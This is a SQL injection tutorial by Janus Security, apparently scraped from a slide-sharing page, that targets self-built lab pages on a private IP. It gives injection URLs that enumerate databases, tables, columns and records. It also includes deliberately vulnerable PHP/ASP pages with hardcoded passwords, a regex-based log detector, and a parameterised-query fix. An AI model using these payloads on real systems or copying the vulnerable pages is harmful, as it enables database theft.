SQL Injection Tutorial
Table of Contents
1 What is SQL Injection
2 SQL Injection Tutorial
2.1 Get Environment Information
2.1.1 Injectable or Not?
2.1.2 Get SQL Injection Keyword
2.1.3 Get Database Type
2.1.4 Method of Getting Data
2.2 Get Data by SQL Injection
2.2.1 Get Database Name
2.2.2 Get Table Name
2.2.3 Get Column Name
2.2.4 Get Data Record
2.3 SQL Injection Tool
3 Build Typical Test Environment
3.1 PHP+MySQL Test Environment
3.2 ASP/ASPX+SQL Server Test Environment
4 References
By Janus Security Software (http://www.janusec.com/ )
1 What is SQL Injection
SQL injection is a code injection technique that exploits a security vulnerability occurring
in the database layer of an application.
The vulnerability is present when user input is either incorrectly filtered for string literal
escape characters embedded in SQL statements or user input is not strongly typed and
thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities
that can occur whenever one programming or scripting language is embedded inside
another. SQL Injection is one of the most common application layer attack techniques
used today.
2 SQL Injection Tutorial
If you have no page with a SQL injection vulnerability to test against, please build one of your
own according to chapter 3 – Build Typical Test Environment.
Here let's begin our SQL injection tutorial.
2.1 Get Environment Information
Example 1: http://192.168.254.21:79/sql.asp?uid=1
Example 2: http://192.168.254.21/mysql.php?username=bob
Both test pages are built in chapter 3 – Build Typical Test Environment.
2.1.1 Injectable or Not?
Example 1:
(1) Normal request; call its result Response0:
http://192.168.254.21:79/sql.asp?uid=1
(2) Add a true condition (1=1); call the result Response1:
http://192.168.254.21:79/sql.asp?uid=1 and 1=1
(3) Add a false condition (1=2); call the result Response2:
http://192.168.254.21:79/sql.asp?uid=1 and 1=2
Usually, if
Response1 = Response0
and Response1 != Response2,
there is a SQL injection vulnerability.
Example 2:
Response0:
http://192.168.254.21/mysql.php?username=bob
Response1 (first attempt, appending the same "and 1=1" condition as in Example 1):
Response1 is not equal to Response0. Notice that bob is a string, not an integer, so try:
Response1:
http://192.168.254.21/mysql.php?username=bob' and '1'='1
Now Response1 is equal to Response0; continue:
Response2:
http://192.168.254.21/mysql.php?username=bob' and '1'='2
Response1 = Response0
and Response1 != Response2,
so there is a SQL injection vulnerability.
In some cases, even when the parameter is an integer, a single quote is needed to match
the SQL statement.
2.1.2 Get SQL Injection Keyword
A SQL injection keyword is a word or phrase that occurs in Response1 but not in
Response2. SQL injection scanners use such keywords, for example WebCruiser Web
Vulnerability Scanner (http://sec4app.com/ ).
In Example 1 and Example 2, the keyword may be "username", "Description", etc.
In the following SQL injection steps, if Response1 includes the keyword but Response2
does not, we can judge that Response1 was produced by a true condition.
2.1.3 Get Database Type
Sometimes you can get the database type simply by adding a single quote to produce an
error:
http://192.168.254.21:79/sql.asp?uid=1'
http://192.168.254.21/mysql.php?username=bob'
But usually you need database-specific syntax to determine the type, which is more complex.
Alternatively, a SQL injection scanner can do it for you.
In Example 1, try to get the database name with:
http://192.168.254.21:79/sql.asp?uid=1 and db_name()>0
db_name() is a SQL Server function that does not exist in MySQL, so in Example 2 this fails:
http://192.168.254.21/mysql.php?username=bob'and db_name()>0 and '1'='1
Try instead:
http://192.168.254.21/mysql.php?username=bob' and (select length(user()))>0 and '1'='1
Because (select length(user())) is valid in MySQL, we can guess that the backend is MySQL.
2.1.4 Method of Getting Data
There are many methods of getting data by SQL injection, but not all of them are
available in every actual penetration test.
These methods include:
* Plain text error (produce an error and read information from the error message);
* Union replace (use "null union select column from table" to replace the response);
* Blind SQL injection (use ASCII comparison when there is no error message in the response);
* Cross-site SQL injection (send the information to a third-party site);
* Time delay (produce a time-consuming SQL statement and infer information from the
response time).
In Example 1, the response of
http://192.168.254.21:79/sql.asp?uid=1 and db_name()>0
includes the database name "test", so data can be obtained by plain text error.
In Example 2, the response of
http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select
char(65,65,65),1%23
includes "AAA" (char(65,65,65)), so data can be obtained by union replace.
2.2 Get Data by SQL Injection
2.2.1 Get Database Name
Example 1:
Get Current Database:
http://192.168.254.21:79/sql.asp?uid=1 and db_name()>0
Get All Databases:
Get the number of databases: 10
http://192.168.254.21:79/sql.asp?uid=1 and
(char(65)%2Bchar(65)%2Bchar(65)%2B(cast((select count(1) from
[master]..[sysdatabases]) as varchar(8))))>0
Get each database name: master, tempdb, etc. by changing the value of dbid.
http://192.168.254.21:79/sql.asp?uid=1 and
(char(65)%2Bchar(65)%2Bchar(65)%2B(select name from [master]..[sysdatabases]
where dbid=1))>0
http://192.168.254.21:79/sql.asp?uid=1 and
(char(65)%2Bchar(65)%2Bchar(65)%2B(select name from [master]..[sysdatabases]
where dbid=2))>0
Example 2:
Get Current Database:
http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select
database(),1 %23
Get All Databases:
Get the number of databases: 18
http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select
concat(char(65,65,65),cast((select count(SCHEMA_NAME) from
information_schema.SCHEMATA) as char)),1 %23
Get each database:
http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select
SCHEMA_NAME,1 from information_schema.SCHEMATA limit 0,1%23
http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select
SCHEMA_NAME,1 from information_schema.SCHEMATA limit 17,1%23
2.2.2 Get Table Name
Example 1:
Get the number of tables: 6
http://192.168.254.21:79/sql.asp?uid=1 and
char(65)%2Bchar(65)%2Bchar(65)%2B(cast((select count(1) from [Test]..[sysobjects]
where xtype=0x55) as varchar(8)))>0
Get each table:
http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 name from(Select top 1
id,name from [Test]..[sysobjects] where xtype=0x55 order by id) T order by id desc)>0
…
http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 name from(Select top 4
id,name from [Test]..[sysobjects] where xtype=0x55 order by id) T order by id desc)>0
Example 2:
Get the number of tables: 5
http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select
concat(char(65,65,65),cast((select count(TABLE_NAME) from
information_schema.tables where TABLE_SCHEMA=char(116,101,115,116)) as
char)),1 %23
Get each table:
http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select
TABLE_NAME,1 from information_schema.tables where
TABLE_SCHEMA=char(116,101,115,116) limit 2,1%23
2.2.3 Get Column Name
Example 1:
Get the number of columns of table 't1': 3
http://192.168.254.21:79/sql.asp?uid=1 and
char(65)%2Bchar(65)%2Bchar(65)%2B(cast((select count(1) from
[Test].information_schema.columns where table_name=0x74003100) as varchar(8)))>0
Get each column:
http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 column_name from
[Test].information_schema.columns where table_name=0x74003100 and
ordinal_position=1)>0
http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 column_name from
[Test].information_schema.columns where table_name=0x74003100 and
ordinal_position=2)>0
Example 2:
Get the number of columns: 2
http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select
concat(char(65,65,65),cast((select count(COLUMN_NAME) from
information_schema.COLUMNS where TABLE_SCHEMA=char(116,101,115,116) and
TABLE_NAME=char(116,49)) as char)),1 %23
Get each column:
http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select
COLUMN_NAME,1 from information_schema.COLUMNS where
TABLE_SCHEMA=char(116,101,115,116) and TABLE_NAME=char(116,49) limit 0,1%23
2.2.4 Get Data Record
Example 1:
http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 isnull(cast([username] as
nvarchar(4000)),char(32))%2Bchar(94)%2Bisnull(cast([uid] as
nvarchar(4000)),char(32))%2Bchar(94)%2Bisnull(cast([des] as nvarchar(4000)),char(32))
from (select top 1 [username],[uid],[des] from [Test]..[t1] order by [username]) T order by
[username] desc)>0
http://192.168.254.21:79/sql.asp?uid=1 and (select top 1 isnull(cast([username] as
nvarchar(4000)),char(32))%2Bchar(94)%2Bisnull(cast([uid] as
nvarchar(4000)),char(32))%2Bchar(94)%2Bisnull(cast([des] as nvarchar(4000)),char(32))
from (select top 2 [username],[uid],[des] from [Test]..[t1] order by [username]) T order by
[username] desc)>0
Example 2:
http://192.168.254.21/mysql.php?username=bob%27 and 1=2 union all select
concat_ws(char(94),ifnull(cast(`user` as char),char(32)),ifnull(cast(`des` as
char),char(32))),1 from test.t1 limit 4,1%23
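The probe and enumeration requests shown in sections 2.1.1, 2.1.3 and 2.2 all leave a recognisable trace in the web server access log, which is where a defender will usually see them first. The following is an added example, not part of the original tutorial and not WebCruiser code, of a small Python log scanner: it decodes the query string of each request, tags it with the technique it resembles (boolean probe, union replace, schema enumeration, database fingerprint function, comment terminator), records a 5xx response as a leaked database error, and per client notes whether several conditional probes hit the same path, which is the Response1/Response2 pair of section 2.1.1. The log lines, client addresses, signature names and the `classify`/`analyze` functions are constructed for this example; only the request payloads mirror the ones shown above.

```python
import re
from collections import defaultdict
from typing import Dict, Set
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log sample (Apache common log format). The request payloads
# mirror the tutorial's own probes and enumeration queries; the client addresses,
# timestamps and response sizes are made up for this example.
SAMPLE_LOG = """\
192.168.254.99 - - [10/Jan/2012:10:00:01 +0000] "GET /mysql.php?username=bob HTTP/1.1" 200 312
192.168.254.99 - - [10/Jan/2012:10:00:02 +0000] "GET /mysql.php?username=bob%27+and+%271%27%3D%271 HTTP/1.1" 200 312
192.168.254.99 - - [10/Jan/2012:10:00:03 +0000] "GET /mysql.php?username=bob%27+and+%271%27%3D%272 HTTP/1.1" 200 41
192.168.254.99 - - [10/Jan/2012:10:00:04 +0000] "GET /mysql.php?username=bob%27+and+1%3D2+union+all+select+database(),1+%23 HTTP/1.1" 200 300
192.168.254.99 - - [10/Jan/2012:10:00:05 +0000] "GET /mysql.php?username=bob%27+and+1%3D2+union+all+select+SCHEMA_NAME,1+from+information_schema.SCHEMATA+limit+0,1%23 HTTP/1.1" 200 300
192.168.254.98 - - [10/Jan/2012:10:00:06 +0000] "GET /sql.asp?uid=1+and+db_name()%3E0 HTTP/1.1" 500 1024
192.168.254.97 - - [10/Jan/2012:10:01:00 +0000] "GET /mysql.php?username=alice HTTP/1.1" 200 300
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Signature names are this example's own labels for the techniques of sections 2.1 and 2.2.
SIGNATURES = {
    "boolean_probe": re.compile(r"\b(and|or)\b\s*'?\d+'?\s*=\s*'?\d+", re.I),  # and 1=1 / and '1'='2
    "union_select": re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I),  # union replace
    "schema_enum": re.compile(r"\b(information_schema|sysobjects|sysdatabases)\b", re.I),
    "db_fingerprint": re.compile(r"\b(db_name|database|user|version|length)\s*\(", re.I),
    "comment_terminator": re.compile(r"(#|--|/\*)\s*$"),  # trailing %23 or -- cutting off the query
}


def classify(target: str) -> Set[str]:
    """Decode the query string of one request target and return the matching signature names."""
    decoded = unquote_plus(urlsplit(target).query)
    return {name for name, rx in SIGNATURES.items() if rx.search(decoded)}


def analyze(log_text: str) -> Dict[str, dict]:
    """Summarise suspicious requests per client address (only clients with at least one hit)."""
    clients: Dict[str, dict] = defaultdict(
        lambda: {"flagged": 0, "tags": set(), "probe_paths": defaultdict(int)}
    )
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        tags = classify(match["target"])
        if not tags:
            continue
        entry = clients[match["ip"]]
        entry["flagged"] += 1
        entry["tags"] |= tags
        if match["status"].startswith("5"):
            entry["tags"].add("server_error")  # database error surfaced to the client (section 2.1.3)
        if "boolean_probe" in tags:
            entry["probe_paths"][urlsplit(match["target"]).path] += 1
    for entry in clients.values():
        # Two or more conditional probes against one path is the true/false pair of section 2.1.1
        entry["probe_pair"] = any(n >= 2 for n in entry["probe_paths"].values())
        entry["probe_paths"] = dict(entry["probe_paths"])
    return dict(clients)


if __name__ == "__main__":
    for ip, summary in analyze(SAMPLE_LOG).items():
        print(ip, summary["flagged"], sorted(summary["tags"]), "probe pair:", summary["probe_pair"])
```

On the constructed sample the scanner attributes four tagged requests and a probe pair to 192.168.254.99, and one fingerprint request with a 500 response to 192.168.254.98, while the plain `username=bob` and `username=alice` requests are left alone. The decoding step matters: the payloads arrive percent-encoded (`%27`, `%23`, `+`), so signatures applied to the raw log line would miss most of them.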
2.3 SQL Injection Tool
This SQL injection tutorial describes how to perform SQL injection manually, but doing it step
by step is inefficient. An automatic SQL injection scanner and SQL injection tool are preferred.
WebCruiser Web Vulnerability Scanner is such an effective penetration testing tool.
WebCruiser - Web Vulnerability Scanner is an effective and powerful web penetration
testing tool that will aid you in auditing your website. It has a vulnerability scanner and a
series of security tools including a SQL Injection Tool, Cross Site Scripting Tool, XPath
Injection Tool, etc.
WebCruiser supports scanning a website as well as proof of concept (POC) checks for web
vulnerabilities: SQL Injection, Cross Site Scripting, XPath Injection, etc. So WebCruiser is
also an automatic SQL injection tool, an XPath injection tool, and a Cross Site Scripting
tool.
Key Features:
* Crawler (Site Directories and Files);
* Vulnerability Scanner: SQL Injection, Cross Site Scripting, XPath Injection etc.;
* SQL Injection Scanner;
* SQL Injection Tool: GET/Post/Cookie Injection POC(Proof of Concept);
* SQL Injection for SQL Server: PlainText/Union/Blind Injection;
* SQL Injection for MySQL: PlainText/Union/Blind Injection;
* SQL Injection for Oracle: PlainText/Union/Blind/CrossSite Injection;
* SQL Injection for DB2: Union/Blind Injection;
* SQL Injection for Access: Union/Blind Injection;
* Post Data Resend;
* Cross Site Scripting Scanner and POC;
* XPath Injection Scanner and POC;
* Auto Get Cookie From Web Browser For Authentication;
* Report Output.
System Requirement: Windows 7/Vista, or Windows XP with .Net Framework 2.0
Download WebCruiser from http://sec4app.com or http://www.janusec.com .
3 Build Typical Test Environment
3.1 PHP+MySQL Test Environment
XAMPP (http://sourceforge.net/projects/xampp/) makes it simple to build a PHP+MySQL
environment.
Create database `test` and table `t1` (mysql.php below uses the columns `user` and `des`) and add some records:
Create a file named mysql.php:
<?php
// Deliberately vulnerable test page: the username parameter is concatenated
// straight into the SQL string, which is what the tutorial in chapter 2 exercises.
$username = $_GET['username'];
if ($username)
{
    $conn = mysql_connect("127.0.0.1", "root", "123456") or die('Error: ' . mysql_error());
    mysql_select_db("test");
    // Injection point: no escaping and no parameter binding
    $SQL = "select * from t1 where user='" . $username . "'";
    //echo "SQL=".$SQL."<br>";
    // Database errors are echoed back to the client (used in section 2.1.3)
    $result = mysql_query($SQL) or die('Error: ' . mysql_error());
    $row = mysql_fetch_array($result);
    if ($row['user'])
    {
        echo "Username:" . $row['user'] . "<br>";
        echo "Description:" . $row['des'] . "<br>";
        echo "TestOK!<br>";
    }
    else echo "No Record!";
    mysql_free_result($result);
    mysql_close();
}
?>
Place mysql.php in the htdocs folder and navigate to
http://192.168.254.21/mysql.php?username=bob
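The page above is vulnerable because $username is pasted into the SQL text. As an added example that is not part of the original tutorial, the following Python program re-creates the same query against an in-memory SQLite database (standing in for the MySQL setup of this section) in both its concatenated form and its parameterised form, and applies the Response0/Response1/Response2 decision rule of section 2.1.1 to each, so a developer can keep it as a regression test for their own code. The table contents, the function names (`make_test_db`, `lookup_vulnerable`, `lookup_safe`, `injectable`) and the `("ERROR", message)` tuple returned on a database error are assumptions of this example; in PHP the equivalent fix is a prepared statement (mysqli or PDO) with a bound parameter instead of string concatenation.

```python
import sqlite3
from typing import Callable, Optional, Tuple

Row = Optional[Tuple[str, str]]


def make_test_db() -> sqlite3.Connection:
    """Constructed stand-in for the tutorial's `test` database: t1(user, des) with two rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE t1 (uid INTEGER PRIMARY KEY, user TEXT, des TEXT)")
    conn.executemany(
        "INSERT INTO t1 (user, des) VALUES (?, ?)",
        [("bob", "bob's description"), ("alice", "alice's description")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> Row:
    """Mirror of mysql.php: the parameter is concatenated into the SQL text, and a
    database error is handed back to the caller like the page's die(mysql_error())."""
    sql = "SELECT user, des FROM t1 WHERE user='" + username + "'"
    try:
        return conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return ("ERROR", str(exc))


def lookup_safe(conn: sqlite3.Connection, username: str) -> Row:
    """Hardened form: a placeholder with a bound parameter, so the input is always
    treated as a string value and never parsed as SQL syntax."""
    return conn.execute("SELECT user, des FROM t1 WHERE user=?", (username,)).fetchone()


def injectable(conn: sqlite3.Connection, lookup: Callable[[sqlite3.Connection, str], Row]) -> bool:
    """Section 2.1.1 decision rule applied to one lookup function: a true condition must
    leave the normal response unchanged while a false condition changes it."""
    response0 = lookup(conn, "bob")
    response1 = lookup(conn, "bob' and '1'='1")
    response2 = lookup(conn, "bob' and '1'='2")
    return response0 == response1 and response1 != response2


if __name__ == "__main__":
    db = make_test_db()
    print("concatenated query injectable:", injectable(db, lookup_vulnerable))
    print("parameterised query injectable:", injectable(db, lookup_safe))
    # The single quote of section 2.1.3: an error for the concatenated query, a clean miss otherwise
    print("single quote, concatenated:", lookup_vulnerable(db, "bob'"))
    print("single quote, parameterised:", lookup_safe(db, "bob'"))
```

With the concatenated query the true condition returns bob's row and the false one returns nothing, so the rule fires; with the bound parameter both probes are simply looked up as a literal username, no such row exists, and the rule does not fire. The lone single quote likewise becomes a syntax error only in the concatenated version, which is the error-message leak the tutorial relies on to fingerprint the database.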
3.2 ASP/ASPX+SQL Server Test Environment
Create database test and table t1 (sql.asp below uses the columns uid, username and des):
Create sql.asp:
<script language=javascript runat=server>
// Deliberately vulnerable test page: uid is concatenated straight into the SQL string.
var dbConn = Server.CreateObject("ADODB.Connection");
dbConn.open("Provider=sqloledb;Data Source=localhost;Initial Catalog=test;User Id=sa;Password=123456;");
var rs = Server.CreateObject("ADODB.RecordSet");
var uid = Request.QueryString("uid");
// Injection point: no type check and no parameter binding
rs.open("select * from t1 where uid=" + uid, dbConn, 3);
Response.write("<html><head><meta http-equiv='Content-Type' content='text/html; charset=gb2312' /><title>Test</title></head>");
if (rs.RecordCount < 1)
{
    Response.write("<p>No Record!</p>");
}
else
{
    Response.write("<table border=1 width=800 cellspacing=0 bordercolordark=009099>");
    Response.write("<tr><td><b>uid</b></td><td><b>username</b></td><td><b>Description</b></td></tr>");
    for (var i = 1; i <= rs.RecordCount; i++)
    {
        if (!rs.EOF)
        {
            Response.write("<tr>");
            Response.write("<td><span style='font-size:9pt'>" + rs("uid") + "</span></td>");
            Response.write("<td><span style='font-size:9pt'>" + rs("username") + "</span></td>");
            Response.write("<td><span style='font-size:9pt'>" + rs("des") + "</span></td>");
            Response.write("</tr>");
            rs.MoveNext();
        }
    }
    Response.write("</table>");
}
Response.write("</html>");
rs.close();
dbConn.close();
</script>
Navigate to http://192.168.254.21:79/sql.asp?uid=1
4 References
1. SQL Injection, http://sec4app.com/download/SqlInjection.pdf
2. WebCruiser Web Vulnerability Scanner User Guide,
http://sec4app.com/download/WebCruiserUserGuide.pdf
3. Janus Security Software, http://www.janusec.com/
4. WebCruiser, http://sec4app.com/

SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 

Recently uploaded (20)

Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 

SQL Injection Tutorial

• 1.
SQL Injection Tutorial

Table of Content
1 What is SQL Injection (page 2)
2 SQL Injection Tutorial (page 2)
2.1 Get Environment Information (page 2)
2.1.1 Injectable or Not? (page 2)
2.1.2 Get SQL Injection Keyword (page 5)
2.1.3 Get Database Type (page 6)
2.1.4 Method of Getting Data (page 7)
2.2 Get Data by SQL Injection (page 8)
2.2.1 Get Database Name (page 8)
2.2.2 Get Table Name (page 11)
2.2.3 Get Column Name (page 12)
2.2.4 Get Data Record (page 14)
2.3 SQL Injection Tool (page 15)
3 Build Typical Test Environment (page 17)
3.1 PHP+MySQL Test Environment (page 17)
3.2 ASP/ASPX+SQL Server Test Environment (page 19)
4 References (page 21)

By Janus Security Software (http://www.janusec.com/)
• 2.
1 What is SQL Injection
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements, or is not strongly typed, and is thereby unexpectedly executed as part of the query. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection is one of the most common application layer attack techniques used today.

2 SQL Injection Tutorial
If you have no pages with a SQL Injection vulnerability to test against, please build one of your own according to chapter 3, Build Typical Test Environment. Here let's begin our SQL Injection Tutorial.

2.1 Get Environment Information
Example 1: http://192.168.254.21:79/sql.asp?uid=1
Example 2: http://192.168.254.21/mysql.php?username=bob
You can get both pages from chapter 3, Build Typical Test Environment.

2.1.1 Injectable or Not?
Example 1:
(1) Normal request; name the result Response0:
http://192.168.254.21:79/sql.asp?uid=1
• 3.
(2) Add a true condition (1=1); name the result Response1:
http://192.168.254.21:79/sql.asp?uid=1 and 1=1
(3) Add a false condition (1=2); name the result Response2:
http://192.168.254.21:79/sql.asp?uid=1 and 1=2
Usually, if Response1 = Response0 and Response1 != Response2, there is a SQL Injection vulnerability.

Example 2:
• 4.
Response0:
http://192.168.254.21/mysql.php?username=bob
Response1:
Response1 is not equal to Response0. Notice that bob is a string, not an integer, so try:
Response1:
http://192.168.254.21/mysql.php?username=bob' and '1'='1
Now Response1 is equal to Response0; continue:
Response2:
http://192.168.254.21/mysql.php?username=bob' and '1'='2
• 5.
Response1 = Response0 and Response1 != Response2, so there is a SQL Injection vulnerability. In some cases, even when the parameter is an integer, a single quote is needed to match the SQL statement.

2.1.2 Get SQL Injection Keyword
A SQL Injection keyword is a word or phrase that occurs in Response1 but not in Response2. The keyword is used by SQL Injection scanners, for example WebCruiser Web Vulnerability Scanner (http://sec4app.com/). In example 1 and example 2, the keyword may be "username", "Description", etc.
• 6.
In the SQL Injection process that follows, if Response1 includes the keyword but Response2 does not, we can judge that Response1 was produced by a true condition.

2.1.3 Get Database Type
Sometimes you can get the database type simply by adding a single quote to produce an error:
http://192.168.254.21:79/sql.asp?uid=1'
http://192.168.254.21/mysql.php?username=bob'
But usually you need to use database-specific syntax to get the type, which becomes complex; or you can use a SQL Injection scanner to do it. In example 1, try to get the database name by:
http://192.168.254.21:79/sql.asp?uid=1 and db_name()>0
• 7.
db_name() is a SQL Server function that is not included in MySQL, so the same probe does not work in example 2:
http://192.168.254.21/mysql.php?username=bob' and db_name()>0 and '1'='1
Try:
http://192.168.254.21/mysql.php?username=bob' and (select length(user()))>0 and '1'='1
